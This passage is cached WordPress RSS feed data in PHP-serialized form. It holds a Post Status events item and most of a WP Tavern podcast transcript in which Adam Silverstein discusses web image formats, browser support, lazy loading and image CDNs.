Day\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=137720\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://poststatus.com/register-to-speak-at-wordfest-live/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:840:\"<ul><li>Coming up on <strong>November 18</strong>, <strong>WordFest Live</strong> will once again <em>“support and promote positive well-being and mental health within remote working communities.”</em> <a href=\"https://www.wordfest.live/2022/november/\">REGISTER →</a></li><li>And don\'t forget <strong>WordPress Accessibility Day</strong> on <strong>November 2-3</strong>! <strong><a href=\"https://wpaccessibility.day/\">REGISTER →</a></strong></li><li>Then on <strong>November 21</strong>, it\'s <strong>Alicia St. Rose</strong> of <strong>WP With Heart </strong>giving a <strong>Meetup</strong> talk on <a href=\"https://www.meetup.com/wordpress-accessibility-meetup-group/events/287994860/\">Being an A11y with Your Content</a>.</li></ul>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Oct 2022 03:37:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: #47 – Adam Silverstein on the State of Images in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=138682\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wptavern.com/podcast/47-adam-silverstein-on-the-state-of-images-in-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:57784:\"Transcript<div>\n<p>[00:00:00] <strong>Nathan Wrigley:</strong> Welcome to the Jukebox podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the blocks, the themes, and in this case, the state of images in WordPress.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast player of choice, or by going to WPTavern.com forward slash feed forward slash podcast. And you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the podcast, I&#8217;m keen to hear from you and hopefully get you, or your idea featured on the show. Head over to WPTavern.com forward slash contact forward slash jukebox and use the contact form there.</p>\n\n\n\n<p>So on the podcast today, we have Adam Silverstein. Adam is a WordPress core comitter, where he works to fix bugs and improve modern web capabilities. As a developer relations engineer in the content ecosystem team at Google, he works to invigorate the open web by empowering and educating developers.</p>\n\n\n\n<p>At the recent WordCamp US he gave a presentation entitled images on the web, past, present and future. In it, he outlined his thoughts on where the web is going in terms of support for different image formats.</p>\n\n\n\n<p>Alongside text images are the bedrock of webpages. We browse the internet and expect pages to have images of all forms. Photos, illustrations, charts and images to convey additional meaning to the text.</p>\n\n\n\n<p>But how do the images actually get on the page? WordPress makes handling images pretty easy, and Adam explains what happens when you upload an image to the media library and then display it on a page or post in a browser.</p>\n\n\n\n<p>We discussed the fact that different image sizes are created automatically by WordPress, which can be used in a variety of contexts across your website. You&#8217;ve likely heard of many of them. But perhaps you have not thought about which image format belongs where.</p>\n\n\n\n<p>As with code, the technology behind images does not stand still. New image formats are being created all the time, and are being supported at differing rates by the major browser vendors.</p>\n\n\n\n<p>In the past, we typically used JPEG. GIF or PNG files to display images on our websites, but there&#8217;s good reason to think about adopting other defaults in the near future. We discussed some of these new formats, such as WebP, AVIF and JPEG XL, and find out how they are speeding up website loading times because of their smaller file sizes.</p>\n\n\n\n<p>We also get into how you can optimize your images and how plugins and SaaS solutions can reduce the size of your files before or after you upload them to your WordPress install.</p>\n\n\n\n<p>Adam has some good advice about a topic which is becoming increasingly important, page load time. And if you&#8217;ve never given the serious thought, this is a great podcast episode for you.</p>\n\n\n\n<p>Typically when we record the podcast, there&#8217;s not a lot of background noise. But that&#8217;s not always the case. Over the coming weeks, I&#8217;ll be bringing you recordings from a recent trip to WordCamp US 2022, and you might notice that the recordings have a little echo or other strange audio artifacts. Whilst the podcasts are more than listenable, I hope that you understand that the vagaries of the real world were at play.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all the links in the show notes by heading over to WPTavern.com forward slash podcast. Where you&#8217;ll find all of the other episodes as well.</p>\n\n\n\n<p>And so without further delay, I bring you Adam Silverstein.</p>\n\n\n\n<p>I am joined on the podcast today by Adam Silverstein. Did I get that right?</p>\n\n\n\n<p>[00:04:38] <strong>Adam Silverstein:</strong> You did. That&#8217;s the way I like to pronounce it.</p>\n\n\n\n<p>[00:04:40] <strong>Nathan Wrigley:</strong> Yeah. Perfect. Adam is here because he did a presentation at Word Camp US this year. What was the presentation about Adam?</p>\n\n\n\n<p>[00:04:46] <strong>Adam Silverstein:</strong> It was images on the web, past, present, and future. So kind of like a history of images and also what&#8217;s coming in the future for modern image formats.</p>\n\n\n\n<p>[00:04:54] <strong>Nathan Wrigley:</strong> Okay. We&#8217;ll delve into that in a moment, but before we do, would you just give us the two minute potted history of Adam. How it is that you&#8217;ve come to speak at a WordCamp.</p>\n\n\n\n<p>[00:05:02] <strong>Adam Silverstein:</strong> Sure. Yeah. I mean, I used to build sites in, uh, Dreamweaver. Then I discovered WordPress as a way to let my clients be able to edit their content. Then one day I decided I should contribute back to WordPress. I became super involved in Core and help rewrite revisions for 3.6. Eventually, I became a core comitter. And, worked at agency, 10up, for quite a while, and then eventually wound up on the CMS team at Google. Working on the web platform, trying to make the web platform better. And I still work on WordPress quite a bit in that role.</p>\n\n\n\n<p>[00:05:30] <strong>Nathan Wrigley:</strong> Google seemed to be doing a lot more with WordPress.</p>\n\n\n\n<p>[00:05:33] <strong>Adam Silverstein:</strong> Absolutely. Since about 2017 when they started showing up at every WordCamp. And also they have that first party plugin Site Kit, which is their own plugin that&#8217;s very well supported that connects your WordPress site to Google Services.</p>\n\n\n\n<p>[00:05:45] <strong>Nathan Wrigley:</strong> Yeah, we spoke to Felix a few episodes ago. So, if you&#8217;re into Site Kit and things like that, you can search for the Felix Arntz episode. But we&#8217;re here to talk about images today. And I&#8217;m going to lead off with something which is going to make me sound incredibly ignorant, and apologize for that.</p>\n\n\n\n<p>And that is simply this. When I visit a webpage or I&#8217;m building a website, images basically just magically appear. They&#8217;re on my computer. I see that there&#8217;s an image, there&#8217;s a file name and a file format, JPEG and so on and so forth. But I honestly have no idea how the browser makes the image appear. I don&#8217;t know what the mystery voodoo that&#8217;s going on in the background to turn a piece of code, I&#8217;m guessing, into something visible on the screen. So ridiculous as it may sound. How do we even get images on the web? How does it work?</p>\n\n\n\n<p>[00:06:31] <strong>Adam Silverstein:</strong> Yeah, so it&#8217;s not a stupid question because it&#8217;s it&#8217;s incredibly complex, actually how browsers deal with images. But at a very basic level, typically there&#8217;s a lot of ways images actually appear on webpages, because it could be in your css or you could load it dynamically with JavaScript.</p>\n\n\n\n<p>But in a normal HTML context, you have an image tag, and that image tag has a url. When the browser first gets your HTML page, it goes through a parsing phase where it tries to decipher what all the elements that I&#8217;m gonna need to construct this visual page. What CSS do I need, what images do I need?</p>\n\n\n\n<p>So it goes through the HTML and each time it encounters an image. It makes another request back to your web server, that&#8217;s running WordPress. And then that image is brought back to the browser. Now that&#8217;s a binary format, that image. So the browser also has to have a capability of decoding that image. That&#8217;s where support for different image formats come in, and all the browsers support all the formats that we&#8217;re used to.</p>\n\n\n\n<p>But then there&#8217;s these more modern formats that maybe aren&#8217;t supported. That&#8217;s kind of the simple version of it, is the browser finds the reference that you have on your HTML. Goes out and retrieves it, just like it does any asset, and then it decompresses it and puts it on your display.</p>\n\n\n\n<p>[00:07:37] <strong>Nathan Wrigley:</strong> If I was to look at the binary code, which made up the image. Which I presume is possible? Is it just a combination of letters, numbers, and characters?</p>\n\n\n\n<p>[00:07:46] <strong>Adam Silverstein:</strong> I mean, it&#8217;s binary encoding, so I don&#8217;t, I don&#8217;t actually know what, it&#8217;s eight bit probably, or 16 bit encoding. But you&#8217;ll have, typically at the first bites of an image will be like a header block. That defines what the image is, the meta information about the image. And then you&#8217;ll have the actual data of the image. And that&#8217;s in chunks. And it depends on how, what image compression format you&#8217;re using.</p>\n\n\n\n<p>But typically images are compressed. So you have some information about that compression in the header, and then you have the chunks that make up the file. But it wouldn&#8217;t be something, if you looked at it, it wouldn&#8217;t make any sense to a human.</p>\n\n\n\n<p>[00:08:17] <strong>Nathan Wrigley:</strong> Right.</p>\n\n\n\n<p>[00:08:18] <strong>Adam Silverstein:</strong> It would just be like binary data, just a bunch of numbers.</p>\n\n\n\n<p>[00:08:20] <strong>Nathan Wrigley:</strong> It kind of reminds me a little bit of TCPIP packets, you know, it&#8217;s surrounded with metadata to give, well, in this case it would be the, the OS stack. But, to give the browser information about what&#8217;s coming down the pipe in the next moment.</p>\n\n\n\n<p>[00:08:32] <strong>Adam Silverstein:</strong> Right.</p>\n\n\n\n<p>[00:08:33] <strong>Nathan Wrigley:</strong> So how big it is, what the dimensions are, and so on and so forth. And then each little bit will render I guess a pixel or something like that.</p>\n\n\n\n<p>[00:08:40] <strong>Adam Silverstein:</strong> Exactly. You could think of it that way. But you know, in a lot of these compression engines, it&#8217;s actually like an eight by eight block, and then there&#8217;s more detail. It&#8217;s very complicated really.</p>\n\n\n\n<p>And even the thing about, like, I very much simplified the how the webpage is loaded because the browser has to decide which resources to load first and which to prioritize. And also just think about an image tag. Image tags now typically have a source set attribute, which indicates which size image we want, depending on the break point that we&#8217;re in.</p>\n\n\n\n<p>So the browser has to figure out that information as well. It&#8217;s quite complex and people have written whole articles on it. So if you&#8217;re interested in it, there&#8217;s, like in my talk, I&#8217;ve got like a links document and there&#8217;s some links that I&#8217;ve put out to like how browsers work. It is very interesting to understand and I think it, like, can help inform, just the more you understand that, the more you understand why trying to optimize performance is so complex.</p>\n\n\n\n<p>[00:09:32] <strong>Nathan Wrigley:</strong> It really does amaze me, and these days, images on the connection at least that I have in my home, seem to load more or less instantaneously, but I remember going back in the day when it was dial up, this laborious line by line creation of the image. You could watch the image load and it would just sort of generate going down. Do you remember seeing all of that?</p>\n\n\n\n<p>[00:09:51] <strong>Adam Silverstein:</strong> You could see it loading.</p>\n\n\n\n<p>[00:09:52] <strong>Nathan Wrigley:</strong> You could actually see the image loading.</p>\n\n\n\n<p>[00:09:53] <strong>Adam Silverstein:</strong> And you could simulate that, you know, in Chrome using the throttling, in Chrome dev. But the other thing to remember is that, we&#8217;re a little privileged here. We have very high speed connections. We have high powered devices, but if you look at the world as a whole, that&#8217;s really not the case. There&#8217;s still a lot of people in the world who are using low powered, they&#8217;re using a phone, it&#8217;s not like a smartphone, like an iPhone. It&#8217;s a very low powered device. So even just the decoding of the images can be expensive.</p>\n\n\n\n<p>And then the bandwidth thing,. Some people, a lot of places in the world, people are paying for bandwidth. So the more bandwidth you use. So they may have images turned off or they may be in a low data mode. A lot of phones support a low data mode where they&#8217;ll try to reduce the amount of data that they&#8217;re using.</p>\n\n\n\n<p>Yeah, it&#8217;s interesting. One of the things we introduced recently into Word Press Core is native lazy loading of images. So this is something we used to do in JavaScript, but now is built into browsers. And what it does is it prevents the images that are off your view port from loading until you start scrolling down. Before you reach them, when you start scrolling, as you get closer to the where they&#8217;re gonna appear, then it will load those images. So, of course this is great for saving resource because when your page loads, if it&#8217;s a long page with many images, you don&#8217;t have to load all those images unless and until the user starts scrolling down the page.</p>\n\n\n\n<p>And this sounds great, and especially at, in a high speed connection environment, it works great. But someone gave the feedback during the process of introducing this, that they work on a low bandwidth connection. And what they like to do is start loading the page and then they switch to another tab and they wait till everything loads and then they come back and they read all their content. But with lazy loading, it doesn&#8217;t work very well because suddenly they scroll a little bit and now they have to wait for another image to load.</p>\n\n\n\n<p>[00:11:26] <strong>Nathan Wrigley:</strong> I&#8217;m imagining that typical user is not browsing the web in that way. But that is an interesting.</p>\n\n\n\n<p>[00:11:31] <strong>Adam Silverstein:</strong> Isn&#8217;t it?</p>\n\n\n\n<p>[00:11:31] <strong>Nathan Wrigley:</strong> Is an interesting case.</p>\n\n\n\n<p>[00:11:32] <strong>Adam Silverstein:</strong> What it just brings up is that you really have to think about your users. When you&#8217;re trying to optimize your site, it&#8217;s not just optimizing for yourself, it&#8217;s optimizing for your users. And that&#8217;s why having real user metrics is so valuable. Collecting actual field data about how people are experiencing your website, as opposed to doing lab tests like we are running lighthouse or page speed insights to try to figure out like, oh, how&#8217;s my site performing? That gives you one metric, but that doesn&#8217;t tell you how people actually in the wild experience your website. If most people have low bandwidth connections, that&#8217;s gonna be really different than what you might get from a local test.</p>\n\n\n\n<p>[00:12:03] <strong>Nathan Wrigley:</strong> Let&#8217;s just pivot a little bit and talk about the different types of images there are. I would imagine almost everybody is familiar with the regular, the usual suspects, shall we say.</p>\n\n\n\n<p>[00:12:12] <strong>Adam Silverstein:</strong> Sure.</p>\n\n\n\n<p>[00:12:12] <strong>Nathan Wrigley:</strong> You know, the JPEGs and the PNGs, and don&#8217;t even know if that&#8217;s how you pronounce it. Some people I&#8217;ve heard say, ping. But I always say PNG and I say GIF.</p>\n\n\n\n<p>[00:12:20] <strong>Adam Silverstein:</strong> Yes, and I say GIF.</p>\n\n\n\n<p>[00:12:21] <strong>Nathan Wrigley:</strong> Okay, yeah, but there&#8217;s all of these. There&#8217;s more, which we&#8217;ll get onto later. But presumably there&#8217;s dozens more that are not typically used on the web. Why have these formats evolved over time? Why don&#8217;t we just have one?</p>\n\n\n\n<p>[00:12:33] <strong>Adam Silverstein:</strong> Right, that&#8217;s a great question, I mean, uh, the GIF format came out 35 years ago, and it pretty much did everything we needed to do, right? It could display images, it had animation, it had transparency. Wow, like images on the web. That was actually a big deal at the time. But there were some limitations. It only had 256 colors. So if you wanted to make a photograph, you had to dither the colors and it only had lossless compression, which is not really that efficient. You know, you maybe get 10 or 15%.</p>\n\n\n\n<p>And it also had copyright issues. The LZW compression algorithm that was in GIF, there were copyright holders. Big corporations and the free software movement didn&#8217;t feel that they could trust this format. That&#8217;s part of why PNG came about 15 years ago, was as a response to the limitations of the compression algorithm, the copyrights. Of course PNG also added alpha transparency, which is an improved version of transparency because you can define opacity on a per pixel basis, and this lets you create an image with a transparent background that&#8217;s got like smooth edges. Like GIF images with transparent have those like blocky edges. But with a PNG, you can create a gradual fading to opacity.</p>\n\n\n\n<p>And that was a big improvement. So it actually added a really useful feature. It&#8217;s great for product images, PNGs. Of course, JPEG introduced lossy compression, which let you just tune your compression to whatever level you wanted. You could get 10 times smaller images that still look good, which was really important at that time. But you could also fine tune that if you were a photographer and you wanted higher quality, you could choose that higher quality setting. That was really unique. GIF didn&#8217;t have that, right.</p>\n\n\n\n<p>And SVG of course is the fourth kind of major one that we use on the web. And that&#8217;s just like very different. It&#8217;s for illustrations. It&#8217;s vector based instead of raster.</p>\n\n\n\n<p>[00:14:10] <strong>Nathan Wrigley:</strong> It&#8217;s a file format isn&#8217;t it?</p>\n\n\n\n<p>[00:14:12] <strong>Adam Silverstein:</strong> It is, it&#8217;s actually XML, think.</p>\n\n\n\n<p>[00:14:13] <strong>Nathan Wrigley:</strong> Yeah.</p>\n\n\n\n<p>[00:14:14] <strong>Adam Silverstein:</strong> Unfortunately it also includes scripting, which means that we don&#8217;t support it in core because of the security concerns. But it&#8217;s also very specific to like illustration type formats. That&#8217;s where it really shines. It has some big advantages. It can be styled with css. You can&#8217;t do that with other image formats. What I&#8217;m trying to get at is that each format introduced new capabilities that were important at the time.</p>\n\n\n\n<p>We started to talk about modern image formats, which I include WebP in, even though it&#8217;s 12 years old at this point. What&#8217;s really cool about WebP is, it kind of combines all the features that came before. So it has the alpha transparency of PNG, but it also has the lossy compression of JPEG.</p>\n\n\n\n<p>So suddenly you can take a transparent PNG and you get 80% improved compression, by making it into a transparent WebP. You still get all the features you need, the alpha transparency, but the compression is lossy now, which is impossible for we didn&#8217;t have a format that had both lossy and alpha transparency.</p>\n\n\n\n<p>WebP kind of is like, essentially trying to be all the things you need. Like if we had started with WebP, we probably wouldn&#8217;t have ever needed another format, because it supports animation, it supports lossy and lossless compression, it supports alpha transparency. It also has better compression than JPEG, like 30% better on average for the same quality. So it&#8217;s a big improvement.</p>\n\n\n\n<p>Then there&#8217;s a couple other formats that are upcoming, I would say. AVIF is probably the next one. It was just, support was just announced in Safari for AVIF. So Edge is the only remaining browser, major browser, that doesn&#8217;t support it. And the big promise of AVIF really over WebP is not on features, it&#8217;s just the compression that it achieves. And it&#8217;s able to achieve a 50% improvement over JPEG. So it&#8217;s very promising.</p>\n\n\n\n<p>And then the one other one that&#8217;s, that&#8217;s kind of coming up that&#8217;s even newer is called JPEG XL. And this is from the same group that made JPEG and it&#8217;s just like a way, way better compression, like AVIF, but it has more affinity to JPEG so it works better with existing JPEGs. Like, it can losslessly recode existing JPEGs. The problem with JPEG XL, at least right now, is that it&#8217;s so new that it&#8217;s not really supported anywhere.</p>\n\n\n\n<p>So there&#8217;s a couple things that have happened. There&#8217;s been a lot of advances in compression over the years. A lot of them actually related to video, because we&#8217;ve, we started streaming video on the web and a lot of investment went into making those compressions better. And then those, like the AVI video format is the basis, the same compression, forms the basis of AVIF, hence the naming similarity.</p>\n\n\n\n<p>I&#8217;m not sure about the WebP, the history of, of like where that compression algorithm came from, but the, the goal was to create something that was better than JPEG. Higher quality at the same size, or smaller size at the same quality. You can think of it in, in either way.</p>\n\n\n\n<p>[00:16:48] <strong>Nathan Wrigley:</strong> Yeah. I remember back in the day, I hate to age myself in this way, but I remember Internet Explorer six, and the enormous fun that we had with trying to get transparency and the sort of kludges that you had to.</p>\n\n\n\n<p>[00:17:00] <strong>Adam Silverstein:</strong> To get it wo work?</p>\n\n\n\n<p>[00:17:03] <strong>Nathan Wrigley:</strong> Yeah, a little JavaScript snippet so that you could get transparency and so on. And so that tells me that, at certain points in. history, certain image formats have not been available in browsers. Broadly speaking, there&#8217;s probably three or four browsers that the majority of people on Earth are using these days. We know what they&#8217;re called. But do they support all of these? Really, the reason I&#8217;m asking this question is, let&#8217;s say I&#8217;ve got a website and I&#8217;ve got 10,000 images on website.</p>\n\n\n\n<p>And I, I now have learned that there&#8217;s a potentially 30% benefit in getting them rendered as, let&#8217;s say, WebP or, or any of the other ones that you mentioned.</p>\n\n\n\n<p>[00:17:37] <strong>Adam Silverstein:</strong> Yeah.</p>\n\n\n\n<p>[00:17:37] <strong>Nathan Wrigley:</strong> Would you say it&#8217;s worthwhile doing that work and re rendering them as, let&#8217;s say, WebP or something like that? Or should I just carry on and do the new formats for the new images? Or like I said, go back and redo them all?</p>\n\n\n\n<p>[00:17:50] <strong>Adam Silverstein:</strong> Yeah, I mean, it probably depends on how much actual traffic you get on those older posts. I think a lot of people have older posts on their site that get very little traffic, and then I would say it&#8217;s probably not worth updating it. With the filter that we have in place in core to control the output, you can use regenerate images and regenerate all your old images.</p>\n\n\n\n<p>And get that WebP benefit, like switch from JPEG to WebP for your old files. There are some caveats there. You need to make sure that the images have been inserted from the editor so that they&#8217;re actually replaced in the HTML. Because if you&#8217;re changing all your image file names, you don&#8217;t want to have broken images in your old posts.</p>\n\n\n\n<p>So WordPress does do that on the fly, where we, if you insert an image from the editor, then it has like a WP image class name. So we can identify the source image and then we go and we, we build that source set into the HTML by looking at the metadata about the image. So when you do that regenerate images, it updates the metadata and therefore you&#8217;ll get the new images even in your old posts.</p>\n\n\n\n<p>But that&#8217;s not guaranteed. If you have really old posts or they don&#8217;t have that WP class, and then for some reason, because you maybe built it with a page builder tool, for example, that doesn&#8217;t include those, there are scenarios where that could break your images. And all the regenerate images plugins have options around this.</p>\n\n\n\n<p>Like um, WPCLI, you know, you can have it not delete the old images. So if you have URLs that are still out there referring to the old images, that&#8217;ll work. Or another example is you might have a third party site that has embedded your image. If you&#8217;re okay with that and you don&#8217;t want to break that, then you want to avoid changing your file name.</p>\n\n\n\n<p>[00:19:13] <strong>Nathan Wrigley:</strong> Yeah.</p>\n\n\n\n<p>[00:19:13] <strong>Adam Silverstein:</strong> So it depends a lot on your use case.</p>\n\n\n\n<p>[00:19:15] <strong>Nathan Wrigley:</strong> Yeah. Caveat emptor really. Just give it a bit of thought. In terms of the browsers. What is the support like for, well obviously we know that the usual suspects that we mentioned at the beginning. The age old ones, GIFs and PNGs and JPEGs, that&#8217;s fine?</p>\n\n\n\n<p>[00:19:29] <strong>Adam Silverstein:</strong> Yes.</p>\n\n\n\n<p>[00:19:29] <strong>Nathan Wrigley:</strong> What about the other ones? What about the WebPs and the AVIFs and.</p>\n\n\n\n<p>[00:19:33] <strong>Adam Silverstein:</strong> Yeah. So the great place to check is the, can I use website, right? They&#8217;ve got all the details but, right now WebP is supported in all the browsers, very widely supported. The only exception is older versions of Safari, and Safari support actually depends on the underlying operating system.</p>\n\n\n\n<p>So this means that users have to upgrade to, I think it&#8217;s two versions ago of MacOS. So there is a small percentage of users out there that have this older Safari version that won&#8217;t load WebPs correctly. It&#8217;s actually very difficult to tell how many because there&#8217;s a bug, in like one of the subsequent versions of Safari where the user agent string misreported the OS version.</p>\n\n\n\n<p>So between a couple versions of Safari and iOS or MacOS, you actually can&#8217;t tell the difference from logs. And so we don&#8217;t have good data about that in the wild, but from the data that we have, we think it&#8217;s between 1 and 2% of browser users in the world that don&#8217;t support WebP currently.</p>\n\n\n\n<p>[00:20:22] <strong>Nathan Wrigley:</strong> Dare I ask, was there any politics in Safari not.</p>\n\n\n\n<p>[00:20:26] <strong>Adam Silverstein:</strong> Supporting it? I don&#8217;t think so. I mean, people say, oh, it&#8217;s a, it&#8217;s a Google format. Like it&#8217;s an open source format that Google developed. But it is widely supported across a huge number of applications. There&#8217;s a lot of criticism of Safari for under investing in web capabilities.</p>\n\n\n\n<p>I don&#8217;t know if this really falls into that. I do think that Apple as a company has a vested interest in keeping their app ecosystem more powerful than the web ecosystem. So I think there&#8217;s sort of some natural tension there, but I probably wouldn&#8217;t blame the Safari team. My expectation is the Safari team is all on board on making the web better.</p>\n\n\n\n<p>But it&#8217;s a big corporation and there&#8217;s different interests. So there could be some political part to it, but I, not that I&#8217;m aware of. Safari, just to continue like the AVIF is sort of the next one. And Safari did just recently announce AVIF support. I think they&#8217;re just slower to adopt some things than other browsers.</p>\n\n\n\n<p>[00:21:15] <strong>Nathan Wrigley:</strong> I guess if I&#8217;m using WordPress and images are a key component. I do want to be really mindful that, that number, the percentage. So you think at the moment WebP is about 98% of.</p>\n\n\n\n<p>[00:21:26] <strong>Adam Silverstein:</strong> 98 to 99.</p>\n\n\n\n<p>[00:21:27] <strong>Nathan Wrigley:</strong> So, at some point the Rubicon got crossed and you can say to. yourself, that&#8217;s fine. The percentage is easily high enough. I can confidently use WebP.</p>\n\n\n\n<p>[00:21:35] <strong>Adam Silverstein:</strong> Yes.</p>\n\n\n\n<p>[00:21:36] <strong>Nathan Wrigley:</strong> How about the other formats? Also just staying on the WebP, let&#8217;s do that bit. first. Would you recommend people to shift over to WebP henceforth?</p>\n\n\n\n<p>[00:21:44] <strong>Adam Silverstein:</strong> Yes.</p>\n\n\n\n<p>[00:21:44] <strong>Nathan Wrigley:</strong> Or is there, is there a good reason to stay with the older formats?</p>\n\n\n\n<p>[00:21:47] <strong>Adam Silverstein:</strong> The only reason I would say not use WebP would be is if you knew most of your users were all on older Safari versions. Or you sent newsletters out to Windows users using Outlook, which is one other use case. We know that doesn&#8217;t support WebP. But this is like old versions of Outlook running on Windows. Not modern outlook.</p>\n\n\n\n<p>[00:22:03] <strong>Nathan Wrigley:</strong> I guess at some point you just have to take the plunge and say there&#8217;s enough.</p>\n\n\n\n<p>[00:22:07] <strong>Adam Silverstein:</strong> Yeah, Well, and we do have a support shim for Safari. So in the browser, if the page is loading WebPs, we add this little bit of JavaScript, it&#8217;s a tiny little bit that does feature detection. So it can actually detect whether the browser supports WebP. And at that point, if it doesn&#8217;t support WebP, we can actually swap the images and use the JPEGs that we do have available, We use like the next largest size that&#8217;s available. And with the current implementation, that would be either your original image or like the one of the H, high definition images that WordPress automatically creates.</p>\n\n\n\n<p>So there will be, like, the primary sizes would be WebP, but there would be still be some available sizes in JPEG. If nothing else, the original image. So that means that your Safari users will still see images, they&#8217;ll just get a slower experience. So 1% of users will get a degraded experience. 99% users will get an improved experience, and then it&#8217;s up to you to decide whether it&#8217;s worth it. But at least those Safari users won&#8217;t be totally left out in the dark. They&#8217;ll still be able to see your images.</p>\n\n\n\n<p>[00:23:02] <strong>Nathan Wrigley:</strong> It&#8217;s really curious. For some reason I have this atrophy and I&#8217;ve known that WebP was at about 98. And I put several images online each and every week, maybe a, a dozen or so. And for some reason I always export them as a JPEG. I haven&#8217;t managed in my own mind to say, this is now the moment. I think you&#8217;ve convinced me. I think.</p>\n\n\n\n<p>[00:23:20] <strong>Adam Silverstein:</strong> Yeah. But I mean, in my opinion, like that really shouldn&#8217;t be up to users to understand that or figure that out. I mean, if you&#8217;re very technical, if you&#8217;re a photographer, maybe. But for the average WordPress user, they don&#8217;t know what image format they&#8217;re using. So this is why, it should be like a core capability where it just happens for users.</p>\n\n\n\n<p>[00:23:37] <strong>Nathan Wrigley:</strong> Yeah. Okay, so WebP, that&#8217;s great. But you, you mentioned a couple of others. There was JPEG, I wanted to say JPEG 2. What was it, JPEG?</p>\n\n\n\n<p>[00:23:46] <strong>Adam Silverstein:</strong> XL.</p>\n\n\n\n<p>[00:23:47] <strong>Nathan Wrigley:</strong> JPEG XL.</p>\n\n\n\n<p>[00:23:50] <strong>Adam Silverstein:</strong> And there&#8217;s a bunch of JPEGs actually. There was one called JPEG 2000 that you might remember that was pushed by the JPEG foundation, or organization, for a while, and that was never adopted. But yeah, let&#8217;s talk about those.</p>\n\n\n\n<p>[00:23:56] <strong>Nathan Wrigley:</strong> So they, they&#8217;re presumably growing in use? Are they safe to use at the moment? Would you recommend, for example, my website using those image formats? Or Should I wait a little bit longer?</p>\n\n\n\n<p>[00:24:07] <strong>Adam Silverstein:</strong> Probably wait a little bit longer, yeah. Safari doesn&#8217;t support it yet. They&#8217;ve announced support, it&#8217;s coming out and whenever the next Mac OS comes out, I think it&#8217;s like this week or something. Or it&#8217;s soon. It&#8217;s very soon. But that means that they&#8217;re just starting support so you probably want to wait till a significant number of users are actually on that version.</p>\n\n\n\n<p>[00:24:23] <strong>Nathan Wrigley:</strong> Yeah.</p>\n\n\n\n<p>[00:24:23] <strong>Adam Silverstein:</strong> Which in the Apple ecosystem actually happens pretty quickly. People generally, you know, there&#8217;s a very large percentage of users who will go to the next OS version very quickly. It doesn&#8217;t cost anything. And it&#8217;s like they&#8217;ve proven that it&#8217;s safe. Um, they have a pretty good uptick rate. So yeah, I mean, the only way, if you really wanted to take advantage of AVIF, we have a couple options. One is using an image CDN. So the advantage of an image CDN is that, it can actually negotiate the format.</p>\n\n\n\n<p>So when browsers make a request for an image, they actually can indicate in their header, in their request headers, which formats they&#8217;re capable of decoding. And that means that the image CDN can be like, oh, you, you take AVIF? I&#8217;ll give you AVIF. That&#8217;s the best one that we have. But if it doesn&#8217;t support AVIF, okay, how about WebP? You support that? Okay. No, you don&#8217;t support any of those? We&#8217;ll give you the JPEG version. The CDN can use this capability negotiation at header time, to deliver the best image. And also they can resize the image to exactly meet the size specifications of your HTML, which WordPress doesn&#8217;t do.</p>\n\n\n\n<p>WordPress generates several sizes, and then we pick the best size that&#8217;s the closest to the one that you&#8217;ve put on your page. And also we can&#8217;t do the header negotiation because we don&#8217;t handle the image requests. Those are handled by Apache or whatever web server you&#8217;re running Nginx, you know. You have a web server running, it actually handles the image request directly. WordPress has no involvement in that whatsoever. And there are plugins that do this, the only way that you can interact with that is, is using like htaccess. There are some ways to do it, but there generally outside of cores scope.</p>\n\n\n\n<p>[00:25:52] <strong>Nathan Wrigley:</strong> Typically, would this CDN be the kind of thing that you would negotiate with your hosting provider?</p>\n\n\n\n<p>[00:25:56] <strong>Adam Silverstein:</strong> Some hosting providers provide it. There&#8217;s of course all 